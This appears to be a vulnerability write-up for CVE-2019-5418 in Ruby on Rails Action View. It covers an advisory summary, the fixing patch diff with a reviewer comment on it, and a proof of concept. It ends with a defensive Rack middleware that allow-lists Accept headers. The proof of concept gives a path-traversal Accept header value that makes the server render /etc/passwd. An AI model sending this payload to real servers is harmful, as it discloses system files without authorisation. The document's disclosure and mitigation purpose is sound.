CVE-2019-5418 - File Content Disclosure on Ruby on Rails


EDIT: this CVE can lead to remote code execution; more info: https://github.com/mpgn/Rails-doubletap-RCE

There is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to render file: can cause arbitrary files on the target server to be rendered, disclosing the file contents.

The impact is limited to calls to render which render file contents without a specified accept format. Impacted code in a controller looks something like this:

Found by John Hawthorn from GitHub


Technical Analysis:

Security Advisory:

Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1

From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <[email protected]>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

[CVE-2019-5418]
[CVE-2019-5419]
---
 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
           else
             [Mime[:html]]
           end
+
+          v = v.select do |format|
+            format.symbol || format.ref == "*/*"
+          end
+
           set_header k, v
         end
       end
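Review bot: the added `select` runs after the `if`/`else` chain has already chosen `v`, and nothing handles the case where every entry is rejected, so `set_header k, v` can store an empty array where the `else` branch above would have supplied `[Mime[:html]]`. Either restore a default when `v` is empty or state in a comment that an empty list is the intended result, and cover it with a test (the diffstat lists test changes, but they are not shown here). A one-line comment on why `format.ref == "*/*"` is exempted from the `format.symbol` check would also help the next reader.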

Proof Of Concept

  1. Run the vulnerable application inside the demo folder:
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s                                                                                                                12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)


Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
  2. Go to the route /chybeta
  3. Intercept the request with Burp and replace the Accept header with Accept: ../../../../../../../../../../etc/passwd{{
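
The rule the patch enforces (keep only registered MIME types or */*) can also be applied in front of an application that cannot be upgraded yet. The following is an added example, not code from this repository or from Rails: a plain-Ruby, Rack-style middleware in which `REGISTERED_TYPES`, `filter_accept` and `AcceptAllowList` are hypothetical names, exercised with the header from the last step above.

```ruby
require "set"

# Hypothetical allow-list: replace with the MIME types your application registers.
REGISTERED_TYPES = Set[
  "text/html", "application/xhtml+xml", "application/xml",
  "application/json", "text/plain", "text/javascript", "text/css", "*/*"
].freeze

# Keep only Accept entries whose media type is allow-listed, preserving
# parameters such as ";q=0.9". Returns nil when no entry survives.
def filter_accept(header)
  return nil if header.nil?
  kept = header.split(",").map(&:strip).select do |entry|
    media_type = entry.split(";", 2).first.to_s.strip.downcase
    REGISTERED_TYPES.include?(media_type)
  end
  kept.empty? ? nil : kept.join(", ")
end

# Rack-style middleware (any object responding to call(env); no gem required).
# It rewrites HTTP_ACCEPT before the request reaches the application.
class AcceptAllowList
  def initialize(app)
    @app = app
  end

  def call(env)
    filtered = filter_accept(env["HTTP_ACCEPT"])
    if filtered
      env["HTTP_ACCEPT"] = filtered
    else
      env.delete("HTTP_ACCEPT") # the application sees no Accept header at all
    end
    @app.call(env)
  end
end

# Constructed sample input: a browser-style header and the header from the PoC.
if __FILE__ == $0
  echo = ->(env) { [200, {}, [env["HTTP_ACCEPT"].inspect]] }
  guard = AcceptAllowList.new(echo)
  ["text/html,application/xml;q=0.9,*/*;q=0.8",
   "../../../../../../../../../../etc/passwd{{"].each do |value|
    puts "#{value} -> #{guard.call({ "HTTP_ACCEPT" => value })[2].first}"
  end
end
```

This is a stopgap placed in `config.ru` or the middleware stack; upgrading to one of the fixed Action View versions listed above remains the actual fix.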
